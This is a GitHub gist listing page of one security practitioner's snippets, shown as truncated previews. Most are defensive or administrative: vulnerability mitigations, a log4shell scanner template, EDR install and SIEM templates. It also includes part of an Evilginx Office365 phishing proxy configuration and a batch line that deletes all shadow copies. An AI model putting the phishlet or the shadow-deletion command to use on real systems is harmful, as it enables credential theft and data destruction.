Niels Hofmans hazcod
hazcod
/ psycopg2-with-reconnects.py
Created
May 28, 2021 13:40
This helper class helps you use Psycopg but with connection reattempts.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class PGDB(): | |
| LIMIT_RETRIES = 5 | |
| def __init__(self, user:str, password:str, host:str, port:int, database:str, sslmode:str, reconnect:bool): | |
| self.user = user | |
| self.password = password | |
| self.host = host | |
| self.port = port | |
| self.database = database | |
| self._connection = None |
hazcod
/ gist:e50779fa6403364d1ceee1c9ecb3f552
Last active
July 22, 2021 11:34
disables the printer spooler (disables local and remote printing) to fix PrintNightmare vulnerabilities.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <wap-provisioningdoc id="1162DF07-F217-449B-95F8-FB85A34D3CA5" name="windows-printerspooler-disable"> | |
| <characteristic type="com.airwatch.winrt.registryoperation" uuid="3fa91319-eac0-4a16-9d10-093ba845b698"> | |
| <parm RegistryPath="HKLM\SYSTEM\CurrentControlSet\Services\Spooler" Action="Replace"> | |
| <Value Name="Start" Data="4" Type="DWORD" /> | |
| </parm> | |
| </characteristic> | |
| </wap-provisioningdoc> |
hazcod
/ CVE-2021-36934.bat
Created
July 22, 2021 11:32
CVE-2021-36934 manual mitigation in commandprompt.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo > CVE-2021-36934 fixer | |
| echo See https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934 | |
| echo Deleting current shadow copies... | |
| vssadmin delete shadows /all /quiet | |
| echo Fixing privilege issue... | |
| icacls %windir%\system32\config\*.* /inheritance:e | |
| echo Creating brand new shadow copy... |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "flag" | |
| "fmt" | |
| "github.com/go-piv/piv-go/piv" | |
| conf "github.com/hazcod/sop/config" | |
| "github.com/pkg/errors" | |
| "github.com/sirupsen/logrus" | |
| "os" |
hazcod
/ falcon-autoinstall.sh
Last active
October 22, 2023 12:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| CLIENT_ID="_FALCON_API_CLIENT_ID_" | |
| CLIENT_SECRET="FALCON_API_CLIENT_SECRET_" | |
| CID="_FALCON_CID_" | |
| TOKEN="_FALCON_INSTALL_TOKEN" | |
| API_HOST="api.eu-1.crowdstrike.com" | |
| function main() { |
hazcod
/ CVE-2021-44228.nuclei.yaml
Last active
December 18, 2023 06:50
Nuclei template to scan for log4shell (CVE-2021-44228).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2021-44228 | |
| info: | |
| name: Log4J RCE | |
| author: iNvist / hazcod | |
| severity: critical | |
| description: CVE-2021-44228 | |
| requests: | |
| - raw: |
hazcod
/ get-intigriti-program-domains.sh
Created
April 7, 2022 09:17
Retrieves domains from the Intigriti public program on the public website.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| join_by() | |
| { | |
| local IFS="$1" | |
| shift | |
| echo "$*" | |
| } | |
| data=$(curl -s https://www.intigriti.com/programs) |
hazcod
/ evilginx-o365-phishlet.yml
Last active
May 23, 2025 13:06
Working Office365 phishlet for evilginx2.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| author: '@hazcod' | |
| min_ver: '3.2.0' | |
| proxy_hosts: | |
| - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} | |
| - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} | |
| sub_filters: | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} |
hazcod
/ ms-sentinel-dcr-template.yml
Created
November 29, 2023 10:11
Microsoft Sentinel resource template for creating a Data Collector Rule (DCR) to ingest custom logs into Microsoft Sentinel SIEM.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", | |
| "contentVersion": "1.0.0.0", | |
| "parameters": { | |
| "dataCollectionRules_OnePasswordLogs_name": { | |
| "defaultValue": "OnePasswordLogs", | |
| "type": "String" | |
| }, | |
| "dataCollectionEndpoints_1password_externalid": { | |
| "defaultValue": "/subscriptions/SUBSCRIPTION-ID-HERE/resourceGroups/myresgroup/providers/Microsoft.OperationalInsights/dataCollectionEndpoints/1password", |
hazcod
/ logicapp-canary.json
Created
February 10, 2024 22:52
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "definition": { | |
| "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#", | |
| "actions": { | |
| "Condition": { | |
| "actions": { | |
| "Terminate": { | |
| "inputs": { | |
| "runStatus": "Cancelled" | |
| }, |